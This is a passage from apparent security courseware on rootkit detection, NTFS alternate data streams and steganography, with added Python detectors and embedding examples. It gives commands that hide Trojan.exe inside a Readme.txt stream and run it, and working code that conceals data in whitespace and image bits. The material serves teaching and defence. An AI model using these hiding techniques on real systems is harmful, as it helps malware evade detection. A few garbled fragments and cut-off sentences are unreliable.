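        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    st = path.stat()
    return {"sha256": digest.hexdigest(), "size": st.st_size, "mode": oct(st.st_mode & 0o7777)}


def snapshot(root) -> dict:
    """Map every regular file under root (relative POSIX path) to its fingerprint."""
    root = Path(root)
    result = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic walk order
        for name in sorted(filenames):
            p = Path(dirpath) / name
            if p.is_symlink() or not p.is_file():
                continue  # symlinks and special files are not hashed here
            result[p.relative_to(root).as_posix()] = fingerprint(p)
    return result


def compare(baseline: dict, current: dict) -> dict:
    """Classify differences between the trusted baseline and the live snapshot."""
    base_keys, cur_keys = set(baseline), set(current)
    return {
        "added": sorted(cur_keys - base_keys),      # e.g. a dropped backdoor or driver
        "removed": sorted(base_keys - cur_keys),    # deleted, or hidden from this view
        "modified": sorted(k for k in base_keys & cur_keys if baseline[k] != current[k]),
    }


def demo() -> dict:
    """Build a clean tree, baseline it, simulate a rootkit install, then re-check."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "etc").mkdir()
        # constructed "clean" system files
        (root / "bin" / "ls").write_bytes(b"#!/bin/sh\nexec /usr/bin/ls \"$@\"\n")
        (root / "etc" / "passwd").write_text("root:x:0:0:root:/root:/bin/sh\n")

        # The baseline must live off the host (read-only media, another machine):
        # a rootkit running as root can otherwise rewrite it to match its changes.
        baseline_json = json.dumps(snapshot(root), sort_keys=True)

        # Simulated rootkit: trojaned binary of identical size, plus a hidden dropper.
        (root / "bin" / "ls").write_bytes(b"#!/bin/sh\nexec /usr/bin/lS \"$@\"\n")
        (root / "bin" / ".sshd").write_bytes(b"constructed backdoor payload")

        return compare(json.loads(baseline_json), snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The trojaned ls keeps its original size, which is why size and timestamp checks alone are insufficient and a strong hash is needed. Run the hashing pass from the alternative trusted medium described earlier whenever the live kernel is suspect: a kernel-level rootkit can intercept the reads that snapshot() performs and return the original bytes.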
Anti-Rootkits
The following anti-rootkits can be used to remove various types of malware, such as rootkits, Trojans, viruses, and worms, from the system. You can download or purchase anti-rootkit software from their websites and install them on your PC to gain protection from malware, especially from rootkits.
GMER
Source: http://www.gmer.net
GMER is an application that helps security professionals to detect and remove rootkits by scanning processes, threads, modules, services, files, disk sectors (MBR), ADSs, registry keys, driver hooking (SSDT, IDT, and IRP calls), and inline hooks.
Figure 6.127: Screenshot of anti-rootkit
A few more important anti-rootkits are listed as follows:
- Stinger (https://www.mcafee.com)
- Avast Free Antivirus (https://www.avast.com)
- TDSSKiller (https://usa.kaspersky.com)
- Malwarebytes Anti-Rootkit (https://www.malwarebytes.com)
- RootkitBuster (http://www.trendmicro.co.in)
NTFS Data Stream
NTFS is a file system that stores a file with the help of two data streams, called NTFS data streams, along with the file attributes. The first data stream stores the security descriptor for the file to be stored, such as permissions, and the second stores the data within a file. ADSs are another type of named data stream that can be present within each file.
ADSs refer to any type of data attached to a file, but not in the file, on an NTFS system. Therefore, ADSs are not present in the file but are attached to it through the file table. The master file table of the partition contains a list of all the data streams that a file contains and their physical locations on the disk. NTFS ADS is a Windows hidden stream that contains metadata for the file, such as attributes, word count, author name, and access and modification times of the
file. ADSs can fork data into existing files without changing or altering their functionality, size, or display to file-browsing utilities. They allow an attacker to inject malicious code into files on an accessible system and execute it without being detected by the user. ADSs provide attackers with a method of hiding rootkits or hacker tools on a breached system and allow a user to execute them while hiding from the system administrator. The only indication that the file was changed is its modification timestamp, which can be innocuous.
How to Create NTFS Streams
Using NTFS data streams, an attacker can almost completely hide files within a system. It is easy to use the streams, but the user can only identify them with specific software. Explorer can display only the root files; it cannot view the streams linked to the root files and cannot show the disk space used by the streams. As such, if a virus implants itself into an ADS, it is unlikely that standard security software will identify it.
1. Launch C:\>notepad myfile.txt:lion.txt, click 'Yes' to create the new file, enter some data, and save the file.
2. Launch C:\>notepad myfile.txt:tiger.txt, click 'Yes' to create the new file, enter some data, and save the file.
3. View the file size of myfile.txt (it should be zero).
4. The following commands can be used to view or modify the stream data hidden in steps 1 and 2, respectively:
   notepad myfile.txt:lion.txt
   notepad myfile.txt:tiger.txt
Note: Notepad is a stream-compliant application. You should not use alternate streams to store critical information.
NTFS Stream Manipulation
You can manipulate NTFS streams to hide a malicious file in other files, such as text files, by doing the following:
Hiding Trojan.exe (malicious program) in Readme.txt (stream):
Use the following command to copy the contents of Trojan.exe into a stream of Readme.txt:
c:\>type c:\Trojan.exe > c:\Readme.txt:Trojan.exe
The "type" command hides a file in an alternate data stream (ADS) behind an existing file. The colon (:) operator tells the command to create or use an ADS. Note that type copies rather than moves the data: the original c:\Trojan.exe still exists afterward and must be deleted separately if it is not to remain on disk.
Figure: the contents of Trojan.exe (size: 2 MB) are stored in the Trojan.exe stream of Readme.txt, whose reported size stays 0
Executing the Trojan:
Type C:\>backdoor to run the Trojan. Here, backdoor is the link to the Trojan.exe stream inside Readme.txt created in the previous step, which on execution installs the Trojan that you have hidden behind Readme.txt.
Note: Use Notepad to read the hidden file. For example, the command C:\>notepad sample.txt:secret.txt creates the secret.txt stream behind the sample.txt file.
How to Defend against NTFS Streams
- To delete hidden NTFS streams, move the suspected files to a file allocation table (FAT) partition
- Use a third-party file integrity checker such as Tripwire File Integrity Manager to maintain the integrity of NTFS partition files against unauthorized ADSs
- Use third-party utilities to show and manipulate hidden streams, such as EventSentry SysAdmin Tools or adslist.exe
- Use programs such as Stream Detector, LADS, or ADS Detector to detect streams
- Enable real-time antivirus scanning to protect against the execution of malicious streams in your system
- Use up-to-date antivirus software on your system
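The detectors listed above are third-party tools, but cmd.exe can enumerate streams itself: the dir /r switch (Windows Vista and later) prints each ADS on its own line beneath its host file, which is how the hidden Readme.txt:Trojan.exe stream from the manipulation example becomes visible. The following added example, not code from the book or from any tool it names, parses that output and flags every stream except Zone.Identifier, the mark-of-the-web stream that browsers and mail clients attach to downloads and that is expected on a normal workstation. The sample dir /r output is constructed; scan_directory() runs the real command and works only on Windows.

```python
"""Find NTFS alternate data streams in `dir /r` output.

Added example (not from the courseware). SAMPLE_DIR_R is constructed; the host
names, stream names and sizes in it are invented for the demo.
"""
import platform
import re
import subprocess

# `dir /r` lists a stream on its own line, indented, with no date column:
#                                   2,097,152 Readme.txt:Trojan.exe:$DATA
ADS_LINE = re.compile(
    r"^\s*(?P<size>[\d,]+)\s+(?P<host>.+?):(?P<stream>[^:\\/]+):\$DATA\s*$"
)
DIR_HEADER = re.compile(r"^\s*Directory of (?P<path>.+?)\s*$")

# Mark-of-the-Web: written on downloaded files by browsers and mail clients.
# Expected on an ordinary workstation, so it is reported but not flagged.
BENIGN_STREAMS = {"Zone.Identifier"}


def parse_dir_r(output: str) -> list:
    """Return one record per ADS found in the text of `dir /r [/s]`."""
    current_dir = ""
    streams = []
    for line in output.splitlines():
        header = DIR_HEADER.match(line)
        if header:
            current_dir = header.group("path")  # /s output has one header per folder
            continue
        m = ADS_LINE.match(line)
        if not m:
            continue  # ordinary file/dir lines start with a date, so they never match
        streams.append({
            "directory": current_dir,
            "host": m.group("host"),
            "stream": m.group("stream"),
            "size": int(m.group("size").replace(",", "")),
            "suspicious": m.group("stream") not in BENIGN_STREAMS,
        })
    return streams


def suspicious_streams(streams: list) -> list:
    """Streams worth a closer look: anything that is not a known benign name."""
    return [s for s in streams if s["suspicious"]]


def scan_directory(path: str) -> list:
    """Run `dir /r /s` on a live NTFS volume (Windows only) and parse it."""
    if platform.system() != "Windows":
        raise RuntimeError("dir /r requires cmd.exe on an NTFS volume")
    proc = subprocess.run(
        ["cmd", "/c", "dir", "/r", "/s", path],
        capture_output=True, text=True, errors="replace", check=False,
    )
    return parse_dir_r(proc.stdout)


# Constructed sample: Readme.txt carries the Trojan.exe stream from the text above,
# setup.exe carries only the benign mark-of-the-web stream.
SAMPLE_DIR_R = """\
 Volume in drive C has no label.

 Directory of C:\\Users\\victim\\Documents

11/02/2020  10:15 AM    <DIR>          .
11/02/2020  10:15 AM    <DIR>          ..
11/02/2020  10:15 AM                 0 Readme.txt
                               2,097,152 Readme.txt:Trojan.exe:$DATA
11/02/2020  09:40 AM           1,048,576 setup.exe
                                      26 setup.exe:Zone.Identifier:$DATA
               2 File(s)      1,048,576 bytes
               2 Dir(s)  40,000,000,000 bytes free
"""

if __name__ == "__main__":
    for s in parse_dir_r(SAMPLE_DIR_R):
        flag = "SUSPICIOUS" if s["suspicious"] else "benign"
        print(f"{flag:10} {s['directory']}\\{s['host']}:{s['stream']} ({s['size']} bytes)")
```

Note that the host file's own size in the listing stays 0 while the stream holds 2 MB, which is exactly what makes ADS hiding effective against Explorer. On a live system the same enumeration is available from PowerShell with Get-Item -Path .\Readme.txt -Stream *, and copying the file to a FAT volume (as the first defense bullet says) drops every stream because FAT has no place to store them.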
NTFS Stream Detectors
There are various NTFS stream detectors available on the market. You can detect suspicious streams with the following NTFS stream detectors. You can download and install these stream detectors from their websites.
Stream Armor
Source: https://securityxploded.com
Stream Armor is a tool used to discover hidden ADSs and clean them completely from your system. Its advanced auto analysis, coupled with an online threat verification mechanism, helps you eradicate any ADSs that may be present. As shown in the screenshot, security professionals use Stream Armor to analyze and detect ADS streams in their systems.
Figure 6.131: Screenshot of Stream Armor
Some additional examples of NTFS stream detectors are listed as follows:
- Stream Detector (https://www.novirusthanks.org)
- GMER (http://www.gmer.net)
- ADS Manager (https://dmitrybrant.com)
- ADS Scanner (https://www.pointstone.com)
- Streams (https://docs.microsoft.com)
What is Steganography?
One of the shortcomings of various detection programs is their primary focus on streaming text data. What if an attacker bypasses normal surveillance techniques and still steals or transmits sensitive data? In a typical situation, after an attacker manages to infiltrate a firm as a temporary or contract employee, he/she surreptitiously seeks out sensitive information. While the organization may have a policy that does not allow removable electronic equipment in the facility, a determined attacker can still find ways to circumvent this by using techniques such as steganography.
Steganography refers to the art of hiding data "behind" other data without the knowledge of the victim. Thus, steganography hides the existence of a message. It replaces bits of unused data in ordinary files, such as graphics, sound, text, audio, and video, with other surreptitious bits. The hidden data can be in the form of plaintext or ciphertext and, sometimes, an image. Utilizing a graphic image as a cover is the most popular method to conceal the data in files.
Unlike encryption, the detection of steganography can be challenging. Thus, steganography techniques are widely used for malicious purposes. For example, attackers can hide a keylogger inside a legitimate image; a small loader on the victim's system then extracts and runs it, after which the keylogger captures the victim's keystrokes (simply opening the image in a normal viewer does not execute the hidden code). Attackers also use steganography to hide information when encryption is not feasible. In terms of security, the hidden data is often itself encrypted, so that even if an analyst discovers the carrier, the message remains protected. Attackers can insert information such as source code for a hacking tool, a list of compromised servers, plans for future attacks, communication and coordination channels, etc.
Classification of Steganography
Based on its technique, steganography can be classified into two areas: technical and linguistic. In technical steganography, a message is hidden using scientific methods, whereas in linguistic steganography, it is hidden in a carrier, which is the medium used to communicate or transfer messages or files. This medium comprises the hidden message, the carrier, and the steganography key. The following diagram depicts the classification of steganography.
Figure 6.133: Classification of steganography
Technical Steganography
Technical steganography uses physical or chemical methods, including invisible ink, microdots, and other means, to hide the existence of a message. It is difficult to categorize all the methods by which these goals are achieved, but some examples can be listed as follows:
- Microdots: A microdot is a text or an image considerably condensed in size (with the help of a reverse microscope), fitting up to one page in a single dot, to avoid detection by unintended recipients. Microdots are usually circular and about one millimeter in diameter but can be converted into different shapes and sizes.
- Computer-Based Methods: A computer-based method makes changes to digital carriers to embed information foreign to the native carriers. Communication of such information occurs in the form of text, binary files, disk and storage devices, and network traffic and protocols. It can alter software, speech, pictures, videos, or any other digitally represented code for transmission.
Computer-Based Steganography Techniques
Based on the cover modifications applied in the embedding process, steganography techniques can be classified into six groups, which are as follows:
- Substitution Techniques: In this technique, the attacker tries to encode secret information by substituting the insignificant bits with the secret message. If the receiver knows the places where the attacker embeds secret information, then he/she can extract the secret message.
  attacks. One can apply the transformations to blocks of images or over the entire image.
- Spread Spectrum Techniques: This technique is less susceptible to interception and jamming. In this technique, communication signals occupy more bandwidth than required to send the information. The sender increases the band spread by means of a code (independent of the data), and the receiver uses a synchronized reception code to recover the information from the spread spectrum data.
- Statistical Techniques: This steganography technique utilizes the existence of "1-bit" schemes by modifying the cover in such a way that, when transmission of a "1" occurs, some of the statistical characteristics change significantly. In other cases, the cover remains unchanged, which makes it possible to distinguish between modified and unmodified covers. The theory of hypothesis testing from mathematical statistics helps in extraction.
Linguistic Steganography

This type of steganography hides the message in another carrier file. Further classification of linguistic steganography includes semagrams and open codes.
Semagrams

Semagrams involve a steganography technique that hides information with the help of signs or symbols. In this technique, the user embeds some objects or symbols in the data to change the appearance of the data to a predetermined meaning. The classification of semagrams is as follows:
- Visual Semagrams: This technique hides information in a drawing, painting, letter, music, or a symbol.
- Text Semagrams: A text semagram hides the text message by converting or transforming the appearance of the carrier text message, such as by changing font sizes and styles, adding extra spaces as whitespace in the document, and including different flourishes in letters or handwritten text.
Open Codes

Open code hides the secret message in a legitimate carrier message specifically designed in a pattern on a document that is unclear to the average reader. The carrier message is sometimes also known as the overt communication, and the secret message as the covert communication. The open-code technique consists of two main groups: jargon codes and covered ciphers.
- Jargon Codes: In this type of steganography, a certain language is used that can be understood by the particular group of people to whom it is addressed, while being meaningless to others. A jargon message is like a substitution cipher in many respects, but instead of replacing individual letters, the words themselves are changed. An example of a jargon code is "cue" code. A cue is a word that appears in the text and then transports the message.
- Covered Ciphers: This technique hides the message in a carrier medium visible to everyone. This type of message can be extracted by any person with knowledge of the method used to hide it. Further classification of covered ciphers includes null ciphers and grille ciphers.
  - Null ciphers: A technique used to hide the message within a large amount of useless data. The original data are mixed with the unused data in any order (diagonally, horizontally, vertically, or in reverse) so that no one can understand it other than those who know the order.
  - Grille ciphers: A technique used to encrypt plaintext by writing it onto a sheet of paper through a pierced (or stenciled) sheet of paper, cardboard, or any other similar material. In this technique, one can decipher the message using an identical grille. This system is thus difficult to crack and decipher, as only someone with the correct grille will be able to decipher the hidden message.
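As an added worked example (written for this page, not part of the original courseware), the following Python implements the two covered-cipher forms just described: a null-cipher reader that pulls the n-th letter of every word out of a cover sentence, and a 4x4 turning grille that writes a message through the holes of a mask, rotates the mask three times to fill the remaining cells, and reads the message back with the same mask. The hole positions and the cover sentence are constructed for the example.

```python
"""Null cipher and turning-grille cipher (added example, constructed inputs)."""
import re
from typing import List, Tuple

N = 4
# One hole per rotation orbit of the 4x4 grid, so four 90-degree turns of the
# mask expose every cell exactly once. (Hole layout constructed for this example.)
HOLES: List[Tuple[int, int]] = [(0, 0), (0, 1), (0, 2), (1, 1)]


def null_cipher_read(cover: str, position: int = 0) -> str:
    """Recover a null cipher: take the letter at `position` of every word."""
    words = re.findall(r"[A-Za-z]+", cover)
    return "".join(w[position] for w in words if len(w) > position).upper()


def _rotate(cell: Tuple[int, int]) -> Tuple[int, int]:
    r, c = cell
    return (c, N - 1 - r)          # 90 degrees clockwise


def grille_order() -> List[Tuple[int, int]]:
    """Cells in the order the mask exposes them: row-major within each rotation."""
    order, holes = [], HOLES
    for _ in range(4):
        order.extend(sorted(holes))
        holes = [_rotate(h) for h in holes]
    if len(set(order)) != N * N:
        raise ValueError("hole mask does not tile the grid under rotation")
    return order


def grille_encrypt(message: str, filler: str = "X") -> List[List[str]]:
    """Write `message` through the grille, padding with `filler` to fill the grid."""
    text = message.upper().replace(" ", "")
    if len(text) > N * N:
        raise ValueError("message longer than one grid; split it over several grids")
    text = text.ljust(N * N, filler)
    grid = [[""] * N for _ in range(N)]
    for (r, c), ch in zip(grille_order(), text):
        grid[r][c] = ch
    return grid


def grille_decrypt(grid: List[List[str]]) -> str:
    """Read the grid through the same mask and the same sequence of rotations."""
    return "".join(grid[r][c] for r, c in grille_order())


if __name__ == "__main__":
    print(null_cipher_read("Send every note daily; help everyone lately partnered."))
    grid = grille_encrypt("MEET AT THE OLD MILL")
    print("\n".join(" ".join(row) for row in grid))
    print(grille_decrypt(grid))
```

The grille's security rests entirely on the secrecy of the hole layout: anyone who can enumerate layouts (there are only a few hundred valid 4x4 turning grilles) can brute-force it, which is why the text above calls it "difficult" rather than secure.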
Types of Steganography based on Cover Medium

Steganography is the art and science of writing hidden messages in such a way that no one other than the intended recipient knows of the existence of the message. The increasing use of electronic file formats with new technologies has made data hiding possible. Basic steganography can be broken down into two areas: data hiding and document marking. Document marking deals with protection against removal; its further classifications include watermarking and fingerprinting. The different types of steganography based on the cover medium are as follows:
- Image Steganography: Images are the most popular cover objects used for steganography. In image steganography, the user hides the information in image files of different formats, such as .PNG, .JPG, and .BMP.
- Document Steganography: In document steganography, the user adds whitespaces and tabs at the ends of the lines.
- Folder Steganography: Folder steganography refers to hiding one or more files in a folder. In this process, the user moves the file physically, but it still stays associated with its original folder for recovery.
- Video Steganography: Video steganography is a technique to hide any kind of file with any extension in a carrying video file. One can apply video steganography to different formats of files, such as .AVI, .MPG4, .WMV, etc.
- Audio Steganography: In audio steganography, the user embeds the hidden messages in a digital sound format.
- Whitespace Steganography: In whitespace steganography, the user hides the messages in ASCII text by adding whitespaces to the ends of lines.
- Web Steganography: In web steganography, a user hides web objects behind other objects and uploads them to a web server.
- Spam/Email Steganography: One can use spam emails for secret communication by embedding the secret messages in some way and hiding the embedded data in the spam emails. This technique is referred to as spam/email steganography.
- DVD-ROM Steganography: In DVD-ROM steganography, the user embeds the content in audio and graphical data.
- Natural Text Steganography: Natural text steganography is the process of converting sensitive information into user-definable free speech, such as a play.
- Hidden OS Steganography: Hidden OS steganography is the process of hiding one OS in another.
- C++ Source-Code Steganography: In C++ source-code steganography, the user hides a set of tools in the files.
Whitespace Steganography

Whitespace steganography is used to conceal messages in ASCII text by adding whitespaces to the ends of the lines. Because spaces and tabs are generally not visible in text viewers, the message is effectively hidden from casual observers. If built-in encryption is used, the message cannot be read even if it is detected.
- Snow
  Source: http://www.darkside.com.au

  Snow is a program for concealing messages in text files by appending tabs and spaces to the ends of lines, and for extracting messages from files containing hidden messages. The user hides the data in the text file by appending sequences of up to seven spaces, interspersed with tabs. This usually allows three bits to be stored every eight columns. There is an alternative encoding scheme that uses alternating spaces and tabs to represent 0s and 1s. However, it was rejected: although it uses fewer bytes, it requires more columns per bit (4.5 vs. 2.67). An appended tab character indicates the start of the data, which allows the insertion of mail and news headers without corrupting the data.
  As shown in the screenshot, attackers use the Snow tool to hide messages in a text file using the following command:

  snow [-C] [-Q] [-S] [-p passwd] [-l line-len] [-f file | -m message] [infile [outfile]]

  Options:
  - -C: Compress the data if concealing, or uncompress it if extracting.
  - -Q: Quiet mode. If not set, the program reports statistics such as compression percentages and the amount of available storage space used.
  - -S: Report on the approximate amount of space available for a hidden message in the text file. The line length is valid, but other options are ignored.
  - -p password: If this is set, data encryption occurs with this password during concealment, or decryption during extraction.
  - -l line-length: When appending whitespaces, Snow will always produce lines shorter than this value. By default, the line length is 80.
  - -f message-file
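The encoding Snow describes (runs of up to seven spaces, each terminated by a tab, three bits per run, after a marker tab at the end of the visible text) is small enough to show end to end. The following Python is an added example written for this page, not Snow's own source: it conceals a message in the trailing whitespace of a cover text, extracts it again, reports capacity in the spirit of `snow -S`, and, for the steganalysis side, lists the lines that carry trailing whitespace. The number of runs per line and the cover text are assumptions of the example; Snow's compression and password encryption are left out.

```python
"""Snow-style whitespace steganography plus a trailing-whitespace detector
(added example; not Snow's own source)."""
from typing import List

GROUP_BITS = 3      # each run of 0..7 spaces terminated by a tab carries 3 bits
MARK = "\t"         # a tab right after the visible text marks the start of hidden data


def _to_bits(data: bytes) -> List[int]:
    return [(b >> k) & 1 for b in data for k in range(7, -1, -1)]


def _from_bits(bits: List[int]) -> bytes:
    usable = len(bits) - len(bits) % 8          # drop the <3 padding bits at the end
    return bytes(int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, usable, 8))


def _groups(bits: List[int]) -> List[str]:
    """Turn the bit stream into runs of spaces, each closed by a tab."""
    bits = bits + [0] * ((-len(bits)) % GROUP_BITS)
    return [" " * ((bits[i] << 2) | (bits[i + 1] << 1) | bits[i + 2]) + "\t"
            for i in range(0, len(bits), GROUP_BITS)]


def capacity(cover: str, groups_per_line: int = 4) -> int:
    """Bytes the cover can hold, in the spirit of `snow -S`."""
    return len(cover.split("\n")) * groups_per_line * GROUP_BITS // 8


def conceal(cover: str, secret: bytes, groups_per_line: int = 4) -> str:
    groups = _groups(_to_bits(secret))
    lines = cover.split("\n")
    if len(groups) > len(lines) * groups_per_line:
        raise ValueError("cover holds %d bytes, secret is %d bytes"
                         % (capacity(cover, groups_per_line), len(secret)))
    out = []
    for line in lines:
        line = line.rstrip(" \t")   # pre-existing trailing whitespace would be read as data
        take, groups = groups[:groups_per_line], groups[groups_per_line:]
        out.append(line + MARK + "".join(take) if take else line)
    return "\n".join(out)


def extract(stego: str) -> bytes:
    bits: List[int] = []
    for line in stego.split("\n"):
        tail = line[len(line.rstrip(" \t")):]
        if not tail.startswith(MARK):
            continue                           # no marker tab: this line carries nothing
        for run in tail[1:].split("\t")[:-1]:  # every run of spaces ends at a tab
            value = len(run)
            bits += [(value >> 2) & 1, (value >> 1) & 1, value & 1]
    return _from_bits(bits)


def suspicious_lines(text: str) -> List[int]:
    """Steganalysis side: 1-based numbers of the lines that end in spaces or tabs."""
    return [n for n, line in enumerate(text.split("\n"), 1) if line != line.rstrip(" \t")]


# Constructed cover text for the example.
COVER = "Meeting moved to Thursday.\nBring the quarterly figures.\nRegards,\nAlice"

if __name__ == "__main__":
    stego = conceal(COVER, b"Hi")
    print(repr(stego))
    print(extract(stego), suspicious_lines(stego), capacity(COVER))
```

The detector is the whole point for a defender: an editor configured to strip trailing whitespace, or a mail gateway that normalizes line endings, destroys the channel without ever decoding it.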
Figure 6.134: Screenshot of Snow
Image Steganography

Image steganography allows you to conceal your secret message within an image. You can exploit the redundant bits of the image to conceal your message within it. These redundant bits are those parts of the image that have very little effect on it if altered. The detection of this alteration is not easy. You can conceal your information within images of different formats (e.g., .PNG, .JPG, .BMP).
Images are popular "cover objects" used for steganography: redundant bits of image data are replaced with the message in such a way that human eyes cannot detect the effect. Image steganography is classified into two types: image domain and transform domain. In image domain (spatial) techniques, a user embeds the messages directly in the intensity of the pixels. In transform domain (frequency) techniques, the transformation of the image occurs first; then the user embeds the message in the transformed image. The following figure depicts the image steganography process and the role of steganography tools in the process.

Figure: Image steganography process
Image File Steganography Techniques

- Least-Significant-Bit Insertion

  The least-significant-bit insertion technique is the most commonly used technique of image steganography, in which the least significant bit (LSB) of each pixel helps hold secret data. The LSB is the rightmost bit of each pixel in an image. In the LSB insertion method, the binary data of the message are broken up and inserted into the LSB of each pixel in the image file in a deterministic sequence. Modifying the LSB does not result in a visible difference because the net change is minimal and can be indiscernible to the human eye. Thus, its detection is difficult.
  Hiding the data:
  - The stego tool makes a copy of an image palette with the help of the red, green, and blue (RGB) model.

  Figure 6.136: Example of LSB insertion

  The letter H is represented by 01001000. You just need to replace the LSB of each of eight consecutive pixel bytes with one bit of that pattern. To retrieve this H at the other side, the recipient combines the LSBs of those image bytes and is thus able to detect the H.
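The H example above, carried through in code. This is an added example for this page, not the output of any of the tools it lists: it embeds a byte string in the LSBs of a raw 8-bit sample buffer (what a BMP or decoded PNG pixel array looks like, here a constructed gradient instead of a real image), prefixes it with a 4-byte length so the extractor knows where to stop, and checks that no sample moved by more than one level. The length header and the synthetic cover are assumptions of the example.

```python
"""LSB insertion over raw 8-bit samples (added example, constructed cover)."""
import struct
from typing import Iterable

HEADER = 4  # bytes of big-endian length prefix so the extractor knows where to stop


def lsb_capacity(samples: bytes) -> int:
    """Payload bytes that fit at one bit per sample, after the length header."""
    return len(samples) // 8 - HEADER


def _bits(data: bytes) -> Iterable[int]:
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def lsb_embed(samples: bytes, payload: bytes) -> bytes:
    """Overwrite the LSB of consecutive samples with the framed payload bits."""
    if len(payload) > lsb_capacity(samples):
        raise ValueError("payload of %d bytes exceeds capacity of %d bytes"
                         % (len(payload), lsb_capacity(samples)))
    framed = struct.pack(">I", len(payload)) + payload
    out = bytearray(samples)
    for i, bit in enumerate(_bits(framed)):
        out[i] = (out[i] & 0xFE) | bit      # only the rightmost bit changes: |delta| <= 1
    return bytes(out)


def _read_bytes(samples: bytes, start_sample: int, count: int) -> bytes:
    out = bytearray()
    for b in range(count):
        value = 0
        for k in range(8):
            value = (value << 1) | (samples[start_sample + b * 8 + k] & 1)
        out.append(value)
    return bytes(out)


def lsb_extract(samples: bytes) -> bytes:
    """Read the length header, then exactly that many payload bytes."""
    length = struct.unpack(">I", _read_bytes(samples, 0, HEADER))[0]
    if length > lsb_capacity(samples):
        raise ValueError("no plausible length header: nothing embedded, or wrong sequence")
    return _read_bytes(samples, HEADER * 8, length)


def synthetic_cover(width: int = 64, height: int = 64) -> bytes:
    """Constructed RGB gradient standing in for a real image's pixel buffer."""
    return bytes((x * 4 + y * 2 + c * 17) & 0xFF
                 for y in range(height) for x in range(width) for c in range(3))


def max_sample_change(a: bytes, b: bytes) -> int:
    return max(abs(p - q) for p, q in zip(a, b))


if __name__ == "__main__":
    cover = synthetic_cover()
    stego = lsb_embed(cover, b"H")
    # The eight samples after the header carry H = 01001000 in their LSBs.
    print([s & 1 for s in stego[32:40]], lsb_extract(stego), max_sample_change(cover, stego))
```

Because the embedding sequence is deterministic (sample 0 onwards), anyone who suspects LSB insertion can run `lsb_extract` directly; real tools spread the bits with a key-seeded permutation, which hides the order but not the statistical footprint examined under steganalysis later in this module.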
- Masking and Filtering

  Masking and filtering techniques exploit the limitations of human vision, which is incapable of detecting slight changes in images. Grayscale images and digital watermarks can hide information in a way similar to that of watermarks on paper. Masking allows you to conceal secret data by placing
- Algorithms and Transformation

  The algorithms and transformation technique involves hiding secret information during image compression. In this technique, the user conceals the information by applying various compression algorithms and transformation functions. A compression algorithm and transformation uses a mathematical function to hide the coefficient of the least bit during image compression. The data are embedded in the cover image by changing the coefficients of a transformation of the image. Generally, JPEG images are the most suitable for compression, as they can function at different compression levels. This technique provides a high level of invisibility of secret data. JPEG images use a discrete cosine transform algorithm to achieve compression. There are three types of transformation used in the compression:
  - Fast Fourier transformation
  - Discrete cosine transformation
  - Wavelet transformation
If the user embeds the information in the spatial domain with the LSB insertion technique, the information hidden in the image can be vulnerable to attacks. An attacker can utilize simple signal-processing techniques and damage the information hidden in the image when the LSB insertion technique is used. This refers to the loss of information when the image undergoes processing such as compression. To overcome these problems, one can hide the information with frequency-domain-based techniques such as fast Fourier transformation, discrete cosine transformation, or wavelet transformation. Digital data are not continuous in the frequency domain. Analysis of image data to which frequency-domain transformations have been applied becomes extremely challenging, which renders steganalysis attacks difficult to perform.
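Both points above (embedding in the coefficients of a transform, and the fragility of spatial LSBs under compression) can be shown on one 8x8 block. The following Python is an added example for this page, not code from any tool it names: it runs the JPEG forward DCT on a constructed block, quantizes it with the standard luminance table scaled to quality 75, embeds bits in the LSBs of the quantized AC coefficients using the Jsteg rule (skip the DC term and any coefficient equal to 0 or 1, so the slot list is the same before and after embedding), extracts them again, and shows that merely decoding the cover through quantization already changes pixel values, which is what destroys a spatial LSB message. The block content, the quality factor and the Jsteg-like rule are assumptions of the example.

```python
"""Transform-domain embedding in JPEG-style quantized DCT coefficients
(added example; Jsteg-like slot rule, constructed 8x8 cover block)."""
import math
from typing import List

Block = List[List[int]]

# Standard JPEG luminance quantization table (quality 50 baseline).
QUANT_BASE = [
    [16, 11, 10, 16, 24, 40, 51, 61],
    [12, 12, 14, 19, 26, 58, 60, 55],
    [14, 13, 16, 24, 40, 57, 69, 56],
    [14, 17, 22, 29, 51, 87, 80, 62],
    [18, 22, 37, 56, 68, 109, 103, 77],
    [24, 35, 55, 64, 81, 104, 113, 92],
    [49, 64, 78, 87, 103, 121, 120, 101],
    [72, 92, 95, 98, 112, 100, 103, 99],
]


def scale_table(base: Block, quality: int) -> Block:
    """IJG quality scaling: quality 50 is the base table, 75 roughly halves it."""
    s = 5000 / quality if quality < 50 else 200 - 2 * quality
    return [[int(max(1, (q * s + 50) // 100)) for q in row] for row in base]


QUANT = scale_table(QUANT_BASE, 75)


def _c(k: int) -> float:
    return 1 / math.sqrt(2) if k == 0 else 1.0


def _cos(i: int, k: int) -> float:
    return math.cos((2 * i + 1) * k * math.pi / 16)


def dct2(block: List[List[float]]) -> List[List[float]]:
    """8x8 forward DCT-II as used by JPEG (input already level-shifted by -128)."""
    return [[0.25 * _c(u) * _c(v) * sum(block[x][y] * _cos(x, u) * _cos(y, v)
                                        for x in range(8) for y in range(8))
             for v in range(8)] for u in range(8)]


def idct2(coef: List[List[float]]) -> List[List[float]]:
    return [[0.25 * sum(_c(u) * _c(v) * coef[u][v] * _cos(x, u) * _cos(y, v)
                        for u in range(8) for v in range(8))
             for y in range(8)] for x in range(8)]


def quantize(block: Block) -> Block:
    """Pixels -> quantized coefficients, i.e. what the JPEG file actually stores."""
    coef = dct2([[p - 128 for p in row] for row in block])
    return [[int(round(coef[u][v] / QUANT[u][v])) for v in range(8)] for u in range(8)]


def dequantize(q: Block) -> Block:
    """Quantized coefficients -> pixels, as a decoder would reconstruct them."""
    pix = idct2([[q[u][v] * QUANT[u][v] for v in range(8)] for u in range(8)])
    return [[max(0, min(255, int(round(p + 128)))) for p in row] for row in pix]


def usable_slots(q: Block):
    """AC coefficients that may carry a bit: every one not equal to 0 or 1.
    Clearing or setting the LSB never moves a value into {0, 1}, so the
    extractor computes exactly the same slot list as the embedder."""
    return [(u, v) for u in range(8) for v in range(8)
            if (u, v) != (0, 0) and q[u][v] not in (0, 1)]


def embed_bits(q: Block, bits: List[int]) -> Block:
    slots = usable_slots(q)
    if len(bits) > len(slots):
        raise ValueError("block holds %d bits, got %d" % (len(slots), len(bits)))
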